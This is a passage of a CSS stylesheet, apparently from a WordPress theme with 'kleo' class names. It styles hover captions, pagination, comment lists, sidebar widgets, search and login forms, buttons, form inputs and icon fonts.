40px; height: 40px; line-height: 40px; text-align: center; color: #fff; display: inline-block; font-size: 22px; top: 50%; left: 50%; margin-top: -20px; margin-left: -20px; position: absolute; border-radius: 50%; -webkit-transform: scale(0); -moz-transform: scale(0); -o-transform: scale(0); -ms-transform: scale(0); transform: scale(0); opacity: 0; -webkit-transition: all .3s linear; -moz-transition: all .3s linear; -o-transition: all .3s linear; -ms-transition: all .3s linear; transition: all .3s linear; } .hover-element:hover > i{ -webkit-transform: scale(1); -moz-transform: scale(1); -o-transform: scale(1); -ms-transform: scale(1); transform: scale(1); opacity: 1; } .hover-caption { position: absolute; bottom: 0; left: 0; right: 0; padding: 15px; color: #000; opacity: 0; -webkit-transition: opacity 0.3s linear; transition: opacity 0.3s linear; } .lighter .hover-caption { background: rgba(255, 255, 255, 0.5); } .darker .hover-caption { background: rgba(0, 0, 0, 0.3); } .element-wrap:hover .hover-caption { opacity: 1; } .static-caption { padding: 15px; position: relative; } .static-caption:before { width: 6px; height: 6px; display: block; content: ' '; z-index: 9999; position: absolute; top: -6px; left: 50%; margin-left: -3px; border-top: 0; border-left: 6px solid transparent !important; border-right: 6px solid transparent !important; border-bottom-style: solid; border-bottom-width: 6px; } .higlight-caption { color: #fff; position: absolute; left:0; top:0; height: 100%; width: 100%; vertical-align: middle; text-align: center; display: inline-block; } .darker .higlight-caption, .darker .hover-caption { color: #fff; } .lighter .higlight-caption, .lighter .hover-caption { color: #000; } .lighter .higlight-caption:hover{ background: rgba(255,255,255,0.5); } .darker .higlight-caption:hover{ background: rgba(0,0,0,0.3); } .darker .higlight-caption .title-caption h3 { color: #fff; } .lighter .higlight-caption .title-caption { color: #000; } .higlight-caption .title-caption { display: table; width: 100%; height: 100%; } .higlight-caption .title-caption h3 { display: table-cell; vertical-align: middle; text-align: center; transition: all 1s ease 0s; } @media (min-width: 1200px) { .higlight-caption .title-caption h3 { font-size: 30px; } } @media (min-width: 768px) and (max-width: 991px) { .higlight-caption .title-caption h3 { font-size: 20px; } } @media (min-width: 1440px) { .higlight-caption .title-caption h3 { font-size: 40px; } } /* Highlight Items */ .highlight-items .thumbnail { transition: all 0.25s ease-in-out; -webkit-transition: all 0.25s ease-in-out; -moz-transition: all 0.25s ease-in-out; -o-transition: all 0.25s ease-in-out; -ms-transition: all 0.25s ease-in-out; margin-bottom: 20px; } .highlight-items div.thumbnail { opacity: 1.0; } .highlight-items div.thumbnail:hover { opacity: 0.3; } .highlight-items:hover > .highlight-this div.thumbnail { opacity: 0.3; } .highlight-items:hover > .highlight-this div.thumbnail:hover { opacity: 1.0; } /* For MediaElements */ .postroll { padding: 5%; color: #fff; } /* Default pagination */ .pagination { display: inline-block; width: 100%; text-align: center; padding: 20px 0; } .pagination > li > a, .pagination > li > span { position: relative; float: none; padding: 0; width: 30px; height: 30px; line-height: 30px; text-align: center; display: inline-block; border-radius: 100%; margin: 0 3px; text-decoration: none; border-style: solid; border-width: 1px; } .pagination > li:first-child > a, .pagination > li:first-child > span, .pagination > li:last-child > a, .pagination > li:last-child > span { border-radius: 100%; } .pagination > .active > a, .pagination > .active > span, .pagination > .active > a:hover, .pagination > .active > span:hover, .pagination > .active > a:focus, .pagination > .active > span:focus { z-index: 2; cursor: default; border-style: solid; border-width: 1px; } /* Sticky pagination */ .pagination-sticky { position: absolute; } .pagination-sticky > a { display: inline-block; } .pagination-sticky #newer-nav, .pagination-sticky #older-nav { background: rgba(0, 0, 0, 0.1); display: inline-block; color: #fff; position: relative; height: 90px; width: 220px; line-height: 20px; position: fixed; top: 50%; z-index: 100; transition: all 0.5s ease; -webkit-transition: all 0.5s ease; } .pagination-sticky #newer-nav { border-top-left-radius: 0.4em; border-bottom-left-radius: 0.4em; right: -190px; } .pagination-sticky #newer-nav:hover { background: rgba(0, 0, 0, 0.7); right: 0; } .pagination-sticky #older-nav { border-top-right-radius: 0.4em; border-bottom-right-radius: 0.4em; left: -190px; } .pagination-sticky #older-nav:hover { background: rgba(0, 0, 0, 0.7); left: 0; } .pagination-sticky #newer-nav:before, .pagination-sticky #older-nav:after { font: 18px 'fontello'; display: inline-block; line-height: 90px; float: left; width: 30px; text-align: center; } .pagination-sticky #newer-nav:before { content: '\e89f'; } .pagination-sticky #older-nav:after { content: '\e89e'; } .pagination-sticky .nav-image { float: left; display: inline-block; width: 90px; } .pagination-sticky #newer-nav .nav-image { float: right; } .pagination-sticky .wp-post-image, .pagination-sticky .avatar { width: 70px; border-radius: 100%; margin: 10px; } .pagination-sticky .outter-title { /*display: table;*/ display: table; float: left; height: 90px; width: 100px; } .pagination-sticky #newer-nav .outter-title {} .pagination-sticky .entry-title { display: table-cell; vertical-align: middle; text-align: center; width: 100px; } /* Only for blog */ .pagination-sticky.member-navigation #newer-nav:before, .pagination-sticky.member-navigation #older-nav:after { width: 30px; } .pagination-sticky.member-navigation #newer-nav, .pagination-sticky.member-navigation #older-nav { width: 130px; } .pagination-sticky.member-navigation #newer-nav { right: -100px; } .pagination-sticky.member-navigation #older-nav { left: -100px; } .pagination-sticky.member-navigation #newer-nav:hover { right: 0; } .pagination-sticky.member-navigation #older-nav:hover { left: 0; } .pagination-sticky.member-navigation #newer-nav .entry-title { text-align: left; padding-left: 10px; } .pagination-sticky.member-navigation #older-nav .entry-title { text-align: right; padding-right: 10px; } @media screen and (max-width: 480px) { .pagination-sticky { background: rgba(0, 0, 0, 0.7); bottom: 0; left: 0; right: 0; height: 40px; position: fixed; width: 100%; z-index: 200; } .pagination-sticky #newer-nav:before, .pagination-sticky #older-nav:after { line-height: 40px; } .pagination-sticky #older-nav:after { position: absolute; right: 0; } .pagination-sticky #newer-nav, .pagination-sticky #older-nav, .pagination-sticky.member-navigation #newer-nav, .pagination-sticky.member-navigation #older-nav { /*background: rgba(0, 0, 0, 0.7);*/ background: none; top: auto; bottom: 0; width: 50%; height: 40px; border-radius: 0; } .pagination-sticky #newer-nav, .pagination-sticky.member-navigation #newer-nav { right: 0; } .pagination-sticky #older-nav, .pagination-sticky.member-navigation #older-nav { left: 0; } .pagination-sticky .nav-image { width: 40px; } .pagination-sticky .wp-post-image, .pagination-sticky .avatar { width: 30px; border-radius: 100%; margin: 5px; } .pagination-sticky .outter-title { height: 30px; } .pagination-sticky .entry-title { display: block; white-space:nowrap; line-height: 40px; font-size: 11px; overflow: hidden; text-overflow:ellipsis; width: 7em; } .pagination-sticky.member-navigation #older-nav .outter-title { width: 100%; padding-right: 30px; } .pagination-sticky.member-navigation .entry-title { width: 100%; } } /* #Comments */ #comments-list { position: relative; } #comments-list > .hr-title { margin: 40px auto 30px; } #comments-list ol { list-style: none; margin: 0; padding: 0; } #comments-list ol li { margin-bottom: 0; } #comments-list .comment-wrap { position: relative; height: auto; padding: 10px 0; } .comment-wrap .comment-avatar { float: left; position: relative; z-index: 2; margin-top: -7px; } .comment-wrap .comment-avatar img { height: 60px; width: 60px; display: block; } #comments-list .comment-content { border-bottom-style: solid; border-bottom-width: 1px; margin: 0 0 0 90px; padding-bottom:10px; } #comments-list .comment-author { font-weight: bold; } #comments-list .comment-date { display: block; font-size: 11px; color: #bbb; margin: 0; padding: 0; } #comments-list .comment-meta-actions, #comments-list .comment-meta-actions a { font-size: 11px; text-transform: uppercase; color: #bbb; display: inline-block; } #comments-list .edit-link a {} #comments-list .meta-sep {} #comments-list .comment-reply a {} #comments-list li ul { list-style: none; padding: 0; } #comments-list ul.children { margin-left: 90px; } #comments-list ul.children ul { margin-left: 0; } #comments-list ul.children .comment-wrap { padding: 0; } #comments-list ul.children .comment-content { margin-left: 0; margin-bottom: 10px; padding-bottom: 0; } #comments-list ul.children .comment-author { font-weight: normal; } #comments-list ul.children .comment-avatar { box-shadow: none; margin-top: 0; } #comments-list ul.children .comment-avatar img { height: 30px; width: 30px; border-width: 0; } #comments-list ul.children .comment-date { display: inline-block; } #comments-list ul.children .comment-meta { margin-left: 40px; } #comments-list ul.children .comment-body {} #comments .comment-respond, #comments-list .comment-respond { margin-left: 90px; } #comments-list ul.children .comment-respond { margin-left: 0; } #comments .activity-timeline { border-right-style: solid; border-right-width: 1px; height: 100%; left: 30px; position: absolute; top: 0; width: 1px; z-index: 0; margin-top: 30px; } /* Trackbacks */ #trackbacks-list span { font-size: 12px; } #trackbacks-list ol li { margin-bottom: 10px; } #trackbacks-list .comment-author { font-size: 12px; margin-bottom: 5px; } #trackbacks-list .comment-content p { font-size: 14px; } /* Comment Form */ #respond-wrap { padding-bottom: 20px; position: relative; z-index: 1; margin-bottom: 30px; } #respond { margin: 30px 0 0; -webkit-box-sizing: border-box; -moz-box-sizing: border-box; -ms-box-sizing: border-box; box-sizing: border-box; } .comment-form-author, .comment-form-email, .comment-form-url { margin-bottom: 0; } #commentform { margin-top: 10px; margin-bottom: 0; } #commentform p.comment-notes { margin-bottom: 20px; } #commentform p.comment-notes span.required { float: none; } #commentform label { font-size: 12px; font-weight: normal; margin-bottom: 4px; } #commentform p.form-allowed-tags { display: none; } #commentform p.form-allowed-tags code { color: #444; } .comment #respond h3#reply-title { display: block; margin: 0px 0 10px; } #reply-title small { font-size: 14px; line-height: 0; margin-left: 5px; } #reply-title small a, #reply-title small a:hover { text-decoration: none; } p.comment-form-comment { margin-top: 5px; margin-bottom: 15px; } p.form-submit { height: auto; overflow: hidden; margin-bottom: 0; } #respond .form-submit input#submit { margin: 0; border: 0; background: none; border-style: solid; border-width: 1px; -webkit-border-radius: 2px; -moz-border-radius: 2px; border-radius: 2px; line-height: 1.5em; padding: 10px; font-size: 11px; text-transform: uppercase; transition: all 0.2s linear; -webkit-transition: all 0.2s linear; } /* Post meta */ ul.link-list { margin-left: 0; padding-left: 0; list-style: none; } ul.link-list li {float:left;margin-right: 10px;} /* Sidebar */ .sidebar { font-size: 93%; } .sidebar select { width: 100%; } .sidebar ul { padding: 0; list-style: none; } .sidebar .widget { margin: 0 0 30px; } /* Widgets */ .widget-title { margin-bottom: 10px; } /* Widgets with borders */ .kleo-widget-recent-posts-li, .widget_categories li, .widget_recent_entries li, .widget_archive li, .widget_display_views li, .widget_recent_comments li, .widget_product_categories li, .widget_layered_nav li { padding: 6px 0 16px; /*border-bottom-style: solid; border-bottom-width: 1px;*/ list-style: none; } .sidebar .kleo-widget-recent-posts-li, .sidebar .widget_categories li, .sidebar .widget_recent_entries li, .sidebar .widget_archive li, .sidebar .widget_display_views li, .sidebar .widget_recent_comments li, .sidebar .widget_product_categories li, .sidebar .widget_layered_nav li { padding: 6px 0; border-bottom-style: solid; border-bottom-width: 1px; list-style: none; } #footer .kleo-widget-recent-posts-li, #footer .widget_categories li, #footer .widget_recent_entries li, #footer .widget_archive li, #footer .widget_display_views li, #footer .widget_recent_comments li, #footer .widget_product_categories li, #footer .widget_layered_nav li { padding: 6px 0; border-bottom-style: solid; border-bottom-width: 1px; list-style: none; } .kleo-widget-recent-posts-li:first-child, .widget_categories li:first-child, .widget_recent_entries li:first-child, .widget_archive li:first-child, .widget_display_views li:first-child, .widget_recent_comments li:first-child, .widget_product_categories li:first-child, .widget_layered_nav li:first-child { border-top-style: solid; border-top-width: 1px; } /* Custom menu */ .widget_nav_menu {} .widget_nav_menu ul { margin: 0; list-style: none; } .widget_nav_menu ul li { clear: both; } .widget_nav_menu ul ul { margin: 0; border: none; border-radius: 0; } .widget_nav_menu li:first-child > a { border-top-style: solid; border-top-width: 1px; } .widget_nav_menu li ul li:first-child a { border-top: none; } .widget_nav_menu a { position: relative; font-weight: normal; display: block; padding: 9px 0; border-bottom-style: solid; border-bottom-width: 1px; border-top: 0; } .widget_nav_menu .menu-item-has-children > a { padding-right: 30px; } .widget_nav_menu ul ul li a { padding-left: 10px; } .widget_nav_menu ul ul ul li a { padding-left: 30px; } .widget_nav_menu .parent .sub-menu { padding: 0; } .widget_nav_menu .parent .sub-menu .sub-menu { padding: 0; } .widget_nav_menu .sub-menu a:before { content:"-"; margin-right: 10px; } .widget_nav_menu .sub-menu .sub-menu a:before { content:"- -"; margin-right: 10px; } .widget_nav_menu a:hover, .widget_nav_menu li.active > a { text-decoration: none; } .widget_nav_menu .parent > a .caret:after { display: block; content: "+"; position: absolute; right: 0; /*top: 50%;*/ top: 16px; font-size: 14px; height: 30px; line-height: 30px; margin-top: -15px; width: 30px; text-align: center; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; } .widget_nav_menu .parent > a .caret.active:after { content: "-"; font-size: 30px; } .widget_nav_menu .parent > a .caret + .caret { display: none; } .widget_nav_menu .sub-menu { display: none; } .widget_nav_menu .current_page_item > a { /*background: #f7f7f7;*/ } /* Recent comments */ #sidebar li.recentcomments a { text-decoration: underline; } /* Tagcloud widget */ .widget_tag_cloud a { display: block; font-size: 11px !important; line-height: 1.2em !important; float: left; padding: 5px 8px; margin: 0 5px 5px 0; border-style: solid; border-width: 1px; -webkit-border-radius: 3px; -moz-border-radius: 3px; border-radius: 3px; cursor: pointer; } .widget_tag_cloud a:hover { text-decoration: none; } .widget_tag_cloud a:active {} /* Social widget */ .kleo-social-widget-output { list-style: none; } .kleo-social-widget-output li { margin: 0; padding: 0; border: none; float: left; margin-right: 5px; margin-bottom: 5px; } .kleo-social-widget-output li img { display: block; } .kleo-social-widget-output li img:hover { opacity: 0.8; } .kleo-social-widget-output li img:active { position: relative; top: 1px; } /* Flickr widget */ .flickr-widget-wrap { padding-top: 6px; } .flickr_badge_image { float: left; display: inline-block; background: #252525; border: 1px solid #333; padding: 4px; margin: -1px -1px 0 0; transition: all 0.3s ease-in-out 0s; } .flickr_badge_image:hover { background: #333; } .flickr_badge_image img { width: 60px; height: 60px; } /* Video widget */ .kleo-video-widget-description { text-align: center; margin-top: 15px; } /* Calendar widget */ #wp-calendar { width: 100%; font-size: 11px; } #wp-calendar thead th { border-style: solid; border-width: 1px; border-top: none; font-size: 11px; font-weight: normal; } #wp-calendar tbody td { text-align: center; border-style: solid; border-width: 1px; line-height: 2.5em; transition: background 0.15s ease; -webkit-transition: background 0.15s ease; -o-transition: background 0.15s ease; -moz-transition: background 0.15s ease; padding: 0; } #wp-calendar tbody td a { display: block; text-decoration: none; /*background: #f7f7f7;*/ color: #333; } #wp-calendar tbody td:hover a { background: #e5e5e5; color: #111; } #wp-calendar tfoot td { padding-top: 1px; padding: 4px; } #wp-calendar caption { cursor: pointer; text-transform: uppercase; margin: 0; padding: 12px; outline: 0 none !important; border-style: solid; border-width: 1px; } #wp-calendar tbody a { display: block; text-decoration: underline; } #wp-calendar th { text-align: center; border: 1px solid transparent; border-top: none; padding: 7px 0; color: #bbb; } #wp-calendar td#today a { color: #fff; } /* Thumb grid widget */ .kleo-recent-posts-thumb-grid li { float: left; width: 65px; margin-left: 7px; margin-bottom: 7px; } .kleo-recent-posts-thumb-grid li.col-1 { margin-left: 0 } .kleo-recent-posts-thumb-grid li a, .kleo-recent-posts-thumb-grid li img { display: block; width: auto; } .kleo-recent-posts-thumb-grid li img:hover { opacity: 0.8 } /* Recent posts with thumb */ .kleo-widget-recent-posts-li { margin: 0; font-size: 12px; min-height: 65px; padding-left: 85px; position: relative; margin-bottom: 15px; padding-bottom: 15px; padding-top: 0; } .kleo-widget-recent-posts-li:first-child { padding-top: 15px; } .kleo-widget-recent-posts-thumbnail { position: absolute; left: 0; top: 0; } .kleo-widget-recent-posts-li:first-child .kleo-widget-recent-posts-thumbnail { top: 15px; } .kleo-widget-recent-posts-thumbnail:hover { opacity: 0.7; } .sidebar .kleo-widget-recent-posts-title { font-weight: 600; color: #000; } .sidebar .kleo-widget-recent-posts-title:hover { text-decoration: none } .sidebar .kleo-widget-recent-posts-date { font-size: 12px; font-weight: 400; color: #777; } .kleo-widget-recent-posts-date { margin-top: 5px; } /* Categories */ .widget_categories li { position: relative; padding-right: 20px; } .widget_categories li:before { content: "\e873"; margin-right: 10px; margin-left: 2px; font-family: "fontello"; /*color: #dedede;*/ } .widget_categories .cat-count-span { position: absolute; right: 0; top: 50%; margin-top: -6px; height: 12px; line-height: 12px; color: #999; font-size: 11px; } /* Product categories */ .widget_product_categories li { position: relative; padding-right: 20px; } .widget_product_categories li:before { content: "\e873"; margin-right: 10px; font-family: "fontello"; /*color: #dedede;*/ } .widget_product_categories .count { position: absolute; right: 0; top: 50%; margin-top: -6px; height: 12px; line-height: 12px; color: #999; font-size: 11px; } /* Woo layered nav */ .widget_layered_nav li { position: relative; } .widget_layered_nav li:before { content: "\e86c"; margin-right: 10px; font-family: "fontello"; /*color: #dedede;*/ } .widget_layered_nav .count { position: absolute; right: 0; top: 50%; margin-top: -6px; height: 12px; line-height: 12px; color: #999; font-size: 11px; } /* Archives */ .widget_archive li:before { content: "\e86c"; margin-right: 10px; font-family: "fontello"; /*color: #dedede;*/ } /* Topic views list */ .widget_display_views li:before { content: "\e86c"; margin-right: 10px; font-family: "fontello"; /*color: #dedede;*/ } /* Recent entries */ .widget_recent_entries ul { padding-left: 0; } .widget_recent_entries li:before { content: "\e86c"; margin-right: 10px; margin-left: 2px; font-family: "fontello"; /*color: #dedede;*/ text-decoration: none; } .widget_recent_entries .post-date { display: block; font-size: 11px; color: #777; margin: 5px 0 0; } /* Recent comments */ .widget_recent_comments li:before { content: "\e86c"; margin-right: 10px; font-family: "fontello"; /*color: #dedede;*/ text-decoration: none; } /* RSS stream */ .widget_rss a.rsswidget { font-weight: bold; font-size: 11px; text-transform: uppercase; } .widget_rss .rss-date { color: #bbb; font-size: 11px; } .widget_rss ul li { padding: 10px 0; } .widget_rss cite { font-style: italic; } .widget_rss cite:before { content: "- "; } /* Buddypress & Wp widget search */ .widget_display_search {} .widget_search {} .widget form#bbp-search-form > div, .widget_search #searchform > div { border-radius: 22px; border-style: solid; border-width: 1px; height: 33px; line-height: 30px; padding: 0 5px 0 10px; position: relative; border-style: solid; border-width: 1px; /*border: 1px solid #e5e5e5;*/ } .widget form#bbp-search-form .button {} .widget form#bbp-search-form input[type=text], .widget_search #searchform input[type=text] { border: none; -webkit-transition: .7s; -moz-transition: .7s; -o-transition: .7s; transition: .7s; color: #bbb; font-weight: normal; background: transparent; box-shadow: none; } .widget form#bbp-search-form input[type=text]:focus, .widget_search #searchform input[type=text]:focus { color: #777; } .widget form#bbp-search-form input[type=submit], .widget_search #searchform input[type=submit] { border: none; text-indent: -9999em; background: url(../../assets/img/sprite.png) no-repeat; width: 24px; height: 24px; border-radius: 100%; position: relative; float: right; /*margin-top: 3px;*/ } .widget form#bbp-search-form input[type=submit]:hover, .widget_search #searchform input[type=submit]:hover { background-position: -24px 0; } .kleo-search-form { max-width: 700px; margin: 0 auto; position: relative; } .kleo-search-form #searchform div.input-group { display: inline-block; width: 100%; margin: 0 auto; } .kleo-search-form #searchform .input-group-btn { position: absolute; right: 26px; top: 30%; } .kleo-search-form #searchform .input-lg { height: 63px; border-radius: 8px; -webkit-transition: all 0.3s ease-in-out 0s; transition: all 0.3s ease-in-out 0s; background-color: #fff; } .kleo-search-form.search-style-default #searchform .input-lg {} .kleo-search-form.search-style-transparent #searchform .input-lg { border: none; box-shadow: 0 2px 3px 0 rgba(0,0,0,0.2); opacity: 0.5; } .kleo-search-form #searchform .input-lg:focus, .kleo-search-form #searchform .input-lg:active { opacity: 1; color: #777; } .kleo-search-form #searchform input#searchsubmit { border: none; text-indent: -9999em; background: url(../../assets/img/sprite.png) no-repeat; width: 24px; height: 24px; border-radius: 100%; } .kleo-search-form #searchform input#searchsubmit:hover { background-position: -24px 0; } .kleo-search-form .kleo_ajax_results { background: #fff; border-radius: 8px; margin-top: 2px; padding: 20px 8px; } .kleo_ajax_results:empty { display: none; } .kleo_ajax_results:not(:empty) {} .kleo-search-form.search-style-default .kleo_ajax_results { box-shadow: 0 1px 1px 0 rgba(0,0,0,0.2); } .kleo-search-form.search-style-transparent .kleo_ajax_results { box-shadow: 0 2px 3px 0 rgba(0,0,0,0.2); } .kleo-search-form .kleo-ajax-search-loading { position: absolute; right: 40px; top: 21px; width: auto; font-size: 20px; } /* Login Widget */ .bbp_widget_login .bbp-logged-in .user-submit { float: left; width: 40px; height: 40px; overflow: hidden; border-radius: 100%; display: inline-block; } .bbp_widget_login img.avatar {} .bbp_widget_login .bbp-logged-in h4 { font-family: inherit; font-size: 12px; line-height: 20px; margin: 0; padding: 0 0 0 50px; } .bbp_widget_login a.logout-link { padding-left: 10px; } .bbp_widget_login a.logout-link:after { content: " \2192"; } .bbp_widget_login input[type="text"], .bbp_widget_login input[type="password"] { border: 1px solid #e5e5e5; height: 30px; line-height: 30px; padding: 0 10px; } .bbp_widget_login .button.user-submit { font-size: 13px; font-weight: normal; margin: 3px 0; min-width: 80px; border-radius: 2px; -webkit-border-radius: 3px; -o-border-radius: 3px; padding: 5px 10px; font-size: 12px; line-height: 1.5; border-radius: 3px; border-style: solid; border-width: 1px; transition: all 0.4s ease-in-out 0s; color: #333; } .bbp_widget_login button.user-submit { margin-right: 10px; } .main-color .bbp_widget_login .button.user-submit:hover, .alternate-color .bbp_widget_login button.user-submit:hover, .bbp_widget_login .button.user-submit:focus, .bbp_widget_login .button.user-submit:active { background-color: #ebebeb; border-color: #adadad; color: #333; } /* Extend Bootstrap Form Elemetnts */ .btn { font-size: 13px; font-weight: normal; margin: 3px 0; min-width: 80px; border-radius: 2px; -webkit-border-radius: 2px; -o-border-radius: 2px; transition: all 0.4s ease-in-out 0s; } .btn.disabled { color: rgba(0, 0, 0, 0.2) !important; } .btn:focus { outline: none; outline: 5px auto -webkit-focus-ring-color; outline-offset: -2px; } .btn:hover, .btn:focus { text-decoration: none; } .btn:active, .btn.active { background-image: none; outline: 0; -webkit-box-shadow: inset 0 3px 5px rgba(0, 0, 0, 0.125); box-shadow: inset 0 3px 5px rgba(0, 0, 0, 0.125); } .btn-see-through { background-color: transparent; box-shadow: none!important; -webkit-box-shadow: none!important; -moz-box-shadow: none!important; -o-box-shadow: none!important; opacity: 1!important; transition: all 0.2s linear; -moz-transition: all 0.2s linear; -webkit-transition: all 0.2s linear; -o-transition: all 0.2s linear; border-style: solid; border-width: 2px; text-transform: uppercase; letter-spacing: 2px; font-size: 12px !important; font-weight: bold; } .btn-see-through.btn-lg { padding: 16px 20px; } .col.light .btn-see-through { border: 2px solid rgba(255,255,255,0.4); color: #fff; } .col.light .btn-see-through:hover { border: 2px solid rgba(255,255,255,1); } .col.dark .btn-see-through { border: 2px solid rgba(0,0,0,0.1)!important; color: #444!important; } .col.dark .btn-see-through:hover { border: 2px solid rgba(0,0,0,0.3)!important; } .col.light .btn.btn-see-through.disabled, .col.dark .btn.btn-see-through.disabled { color: #ddd!important; } .btn.disabled, .btn[disabled], fieldset[disabled] .btn { pointer-events: none; cursor: not-allowed; opacity: 0.65; filter: alpha(opacity=65); -webkit-box-shadow: none; box-shadow: none; } .btn-link { font-weight: normal; color: #428bca; cursor: pointer; border-radius: 0; } .btn-link, .btn-link:active, .btn-link[disabled], fieldset[disabled] .btn-link { background-color: transparent; -webkit-box-shadow: none; box-shadow: none; } .btn-link, .btn-link:hover, .btn-link:focus, .btn-link:active { border-color: transparent; } .btn-link:hover, .btn-link:focus { color: #2a6496; text-decoration: underline; background-color: transparent; } .btn-link[disabled]:hover, fieldset[disabled] .btn-link:hover, .btn-link[disabled]:focus, fieldset[disabled] .btn-link:focus { color: #999; text-decoration: none; } /* NEW Buttons */ .btn i { margin-right: 10px; } .btn-highlight:active, .btn-highlight.active, .open .dropdown-toggle.btn-highlight { background-image: none; } .btn.btn-highlight.style2 { letter-spacing: 2px; font-size: 12px; font-weight: bold; text-transform: uppercase; } .btn .btn-twitter { background-color: #00b9f7; color: #fff; } .btn .btn-twitter:hover { background-color: #01aee8; } .btn .btn-facebook { background-color: #367bb7; color: #fff; } .btn .btn-facebook:hover { background-color: #2d70aa; } .btn-special { box-shadow: 0 0 0 1px #ebebeb; border: 5px solid #fff !important; border-radius: 30px !important; } .btn-subtext small { display: block; } .btn.btn-text-animated { overflow: hidden; -webkit-backface-visibility: hidden; -moz-backface-visibility: hidden; backface-visibility: hidden; } .btn-text-animated span:first-child { display: inline-block; width: 100%; height: 100%; -webkit-transition: all 0.3s; -webkit-backface-visibility: hidden; -moz-transition: all 0.3s; -moz-backface-visibility: hidden; transition: all 0.3s; backface-visibility: hidden; } .btn-text-animated:hover span:first-child { -webkit-transform: translateX(-120%); -moz-transform: translateX(-120%); -ms-transform: translateX(-120%); transform: translateX(-120%); } .btn-text-animated span:last-child { display: inline-block; width: 100%; height: 100%; -webkit-transition: all 0.3s; -webkit-backface-visibility: hidden; -moz-transition: all 0.3s; -moz-backface-visibility: hidden; transition: all 0.3s; backface-visibility: hidden; } .btn-text-animated span:last-child { position: absolute; display: inline-block; width: 100%; height: 100%; margin-left: auto; margin-right: auto; left: 100%; right: 0; } .btn-text-animated:hover span:last-child { left: 0; } .btn-app { font-weight: bold; text-align: left; } .btn-app i { font-size: 34px; line-height: 36px; font-weight: normal; float: left; text-align: center; width: 34px; } .btn-app.btn-xs i { font-size: 24px; line-height: 32px; width: 24px; } .btn-app.btn-xs small { line-height: 14px; margin-left: 34px; } .btn-app.btn-xs span { margin-left: 34px; } .btn-app small { font-size: 12px; font-weight: normal; display: block; margin-left: 40px; } .btn-app span { display: block; margin-left: 40px; } .btn-group-lg > .btn { border-radius: 4px; } .btn-or { background: #fff; border: 1px solid #ccc; border-radius: 50%; color: #666; display: inline-block; font-size: 10px; font-style: italic; height: 26px; left: 50%; line-height: 21px; margin: -13px 0 0 -17px; position: absolute; text-align: center; top: 50%; width: 26px; z-index: 11; } .btn-group-lg .btn { font-size: 14px; padding: 16px 26px; } .btn-group-or > .btn:first-child:after { background: #fff; border: 1px solid #ccc; border-radius: 50%; color: #666; display: inline-block; font-size: 10px; font-style: italic; height: 26px; right: -13px; line-height: 21px; position: absolute; text-align: center; top: 50%; margin: -13px 0 0 0; width: 26px; z-index: 999; content: " or "; } .btn-group-or > .btn-highlight.btn:first-child:after { color: #fff; border: 2px solid #fff; } .btn-group-or > .btn-highlight.btn:last-child { margin-left: 2px; } .btn-lg { padding: 14px 20px; font-size: 16px; line-height: 1.33; border-radius: 4px; } .btn-sm, .btn-xs { padding: 5px 10px; font-size: 12px; line-height: 1.5; border-radius: 3px; } .btn-xs { padding: 1px 5px; } .kleo-facebook-connect.btn.btn-default { background-color: #3B5997; color: #fff; border-color: #2b4780; } .kleo-facebook-connect.btn.btn-default:hover { background-color: #2b4780; color: #fff; border-color: #2b4780; } /* Input Forms */ input[type="text"], input[type="password"], input[type="date"], input[type="datetime"], input[type="datetime-local"], input[type="month"], input[type="week"], input[type="email"], input[type="number"], input[type="search"], input[type="tel"], input[type="time"], input[type="url"], textarea { /*background-color: #fff;*/ /*border: 1px solid #e5e5e5;*/ border-style: solid; border-width: 1px; /*color: rgba(0, 0, 0, 0.75);*/ display: block; margin: 0 0 1em; padding: 0.5em; } input[type="text"]:focus, input[type="password"]:focus, input[type="date"]:focus, input[type="datetime"]:focus, input[type="datetime-local"]:focus, input[type="month"]:focus, input[type="week"]:focus, input[type="email"]:focus, input[type="number"]:focus, input[type="search"]:focus, input[type="tel"]:focus, input[type="time"]:focus, input[type="url"]:focus, textarea:focus { /*border-color: #bbb;*/ outline: none; } input[type="text"][disabled], input[type="password"][disabled], input[type="date"][disabled], input[type="datetime"][disabled], input[type="datetime-local"][disabled], input[type="month"][disabled], input[type="week"][disabled], input[type="email"][disabled], input[type="number"][disabled], input[type="search"][disabled], input[type="tel"][disabled], input[type="time"][disabled], input[type="url"][disabled], textarea[disabled] { /*background-color: #f7f7f7;*/ } input[type=number] { -moz-appearance: textfield; } input[type=number]::-webkit-inner-spin-button, input[type=number]::-webkit-outer-spin-button { -webkit-appearance: none; } .input-lg { line-height: 34px; } /* Custom selects */ select { height: 30px; /*line-height: 30px;*/ padding: 4px 30px 4px 9px !important; border-radius:2px; border-style: solid; border-width: 1px; outline: none; display: inline-block; -webkit-appearance: none; -moz-appearance: none; appearance: none; cursor:pointer; /* Remove arrow from firefox */ text-indent: 0.01px; text-overflow: ""; background: url("../img/select-arrow.png") 100% 50% no-repeat; } /* Targetting Webkit browsers only. FF will show the dropdown arrow with so much padding. */ @media screen and (-webkit-min-device-pixel-ratio:0) { select { padding-right: 35px !important; } } @-moz-document url-prefix() { select { /*background-image: none;*/ } } /* IE Fix */ select::-ms-expand { display: none; } .lt-ie9 select, .lt-ie10 select { background: none; padding-right: 3px !important; } /* Labels */ .label { color: #777; padding: 0; font-size: 100%; } .label-default, .label-primary, .label-success, .label-info, .label-warning, .label-danger { padding: .2em .6em .3em; font-size: 75%; color: #fff; } /* Legend */ legend { display: block; width: 100%; padding: 0; margin-bottom: 0; font-size: 13px; line-height: inherit; color: #777; border: 0; } /* Pagers */ .pager {} .pager li > a, .pager li > span { display: inline-block; padding: 5px 10px; min-width: 32px; height: 32px; border-radius: 3px; } .pager li > a i, .pager li > span i { margin-left: -14px; margin-right: -14px; } .pager li > a:hover, .pager li > a:focus { text-decoration: none; background-color: transparent; } .pager li > a.btn-prev, .pager li > a.btn-next, .pager li > a.btn-close { } .pager li > a.btn-prev {} .pager li > a.btn-next {} .pager li > a.btn-close {} /* ----------------------------------------- 06. Font Icons Core ----------------------------------------- */ [class^="icon-"]:before, [class*=" icon-"]:before { font-style: normal; font-weight: normal; speak: none; display: inline-block; text-decoration: inherit; margin-right: auto !important; text-align: center; margin-left: auto !important; } /* makes the font 33% larger relative to the icon container */ .icon-large:before { vertical-align: -10%; font-size: 1.3333333333333333em; } /* makes sure icons active on rollover in links */ a [class^="icon-"], a [class*=" icon-"] { display: inline; } /* increased font size for icon-large */ [class^="icon-"].icon-fixed-width, [class*=" icon-"].icon-fixed-width { display: inline-block; width: 1.1428571428571428em; text-align: right; padding-right: 0.2857142857142857em; } 